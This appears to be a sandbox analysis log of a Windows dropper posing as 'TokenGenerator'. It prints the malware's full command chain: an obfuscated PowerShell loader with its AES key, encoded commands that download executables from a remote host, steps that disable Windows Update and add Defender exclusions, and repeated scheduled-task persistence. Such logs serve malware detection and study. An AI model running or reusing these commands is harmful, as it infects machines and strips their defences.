C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe
"TokenGenerator.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $yNMNp = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat').Split([Environment]::NewLine);foreach ($DUpwR in $yNMNp) { if ($DUpwR.StartsWith(':: ')) { $zpFYG = $DUpwR.Substring(3); break; }; };$NDpIw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zpFYG);$FglUn = New-Object System.Security.Cryptography.AesManaged;$FglUn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$FglUn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$FglUn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xe8pXJdA3AONCe1Zlyq3gqv0U2vVZ+ZFx6YQNe5/72I=');$FglUn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6rOZj0Gc5fVio24RyZePg==');$tMNPD = $FglUn.CreateDecryptor();$NDpIw = $tMNPD.TransformFinalBlock($NDpIw, 0, $NDpIw.Length);$tMNPD.Dispose();$FglUn.Dispose();$duObo = New-Object System.IO.MemoryStream(, $NDpIw);$yiuvK = New-Object System.IO.MemoryStream;$VgABR = New-Object System.IO.Compression.GZipStream($duObo, [IO.Compression.CompressionMode]::Decompress);$VgABR.CopyTo($yiuvK);$VgABR.Dispose();$duObo.Dispose();$yiuvK.Dispose();$NDpIw = $yiuvK.ToArray();$DvMBT = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($NDpIw);$pFgMM = $DvMBT.EntryPoint;$pFgMM.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHAAcQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAHMAIAAvACAAVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGYAegBpACMAPgA7ACIAOwA8ACMAcgBuAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGoAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHAAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBrAHgAYwAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AZABlAHYALgBlAHgAZQAnACwAIAA8ACMAZgBzAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAGQAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAG0AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApACkAPAAjAHgAawBmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADEANwAxADcALwBnAHIAZwBlAHIAZQByAGcAcgBlAGcAZwAvAHIAYQB3AC8ANwA0AGUAYgAwADMAZgA3AGMAOAA0ADgAMwA1AGMAMgBlADEAMgA1ADYAYgA0AGIANwA4ADIAOAA1ADgANwBjAGIANgA4ADcANQA2ADgANQAvAGgAYQBmAHUAawAuAGUAeABlACcALAAgADwAIwB5AGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAYQBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAcQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAYwBtAHEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AbgBvAGIAbwB5AC4AZQB4AGUAJwAsACAAPAAjAG4AZABrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwB4AHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBuAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwBqAGwAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHMAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAeAB0AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAZQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGoAdQByACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAaABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwB6AHQAeAAjAD4A"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#pqn#>[System.Windows.Forms.MessageBox]::Show('No VMs / VPS allowed!','','OK','Error')<#fzi#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
4⤵
- Executes dropped EXE
PID:4748

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:1204

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:2540

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:2772

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1352

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:5008

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1072

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:992

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:4412

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:2412

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:392

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3940

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:4980

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2088

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2868

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:3680

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:1804

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:4484

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:1064

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:4468

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:4764

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:3744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:228

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAegAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgBjAGgAcgAuAGUAeABlACIAJwApACAAPAAjAGgAdAB5AHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBzAGEAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAawAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAEcATgBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxACMAPgA7AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:3456

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:1808

C:\Users\Admin\AppData\Local\Temp\3.exe
"C:\Users\Admin\AppData\Local\Temp\3.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:2200

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe"
5⤵
- Checks computer location settings
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat" "
6⤵
PID:2220

C:\comsavesbroker\containersavesdhcp.exe
"C:\comsavesbroker\containersavesdhcp.exe"
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comsavesbroker/'
8⤵
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
PID:3840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
PID:4136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
PID:4168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
PID:1940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
PID:1740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
PID:3284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ufk0Q6MZw.bat"
8⤵
PID:3496

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:1416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4148

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:3540

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe"
4⤵
- Views/modifies file attributes
PID:2772

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\Provisioning\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\schemas\Provisioning\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\schemas\Provisioning\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "11" /sc MINUTE /mo 9 /tr "'C:\comsavesbroker\1.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1" /sc ONLOGON /tr "'C:\comsavesbroker\1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "11" /sc MINUTE /mo 14 /tr "'C:\comsavesbroker\1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\comsavesbroker\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\comsavesbroker\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\comsavesbroker\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Documents\My Pictures\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Documents\My Pictures\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Documents\My Pictures\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\en-US\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-US\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4152

C:\Windows\system32\schtasks.exe
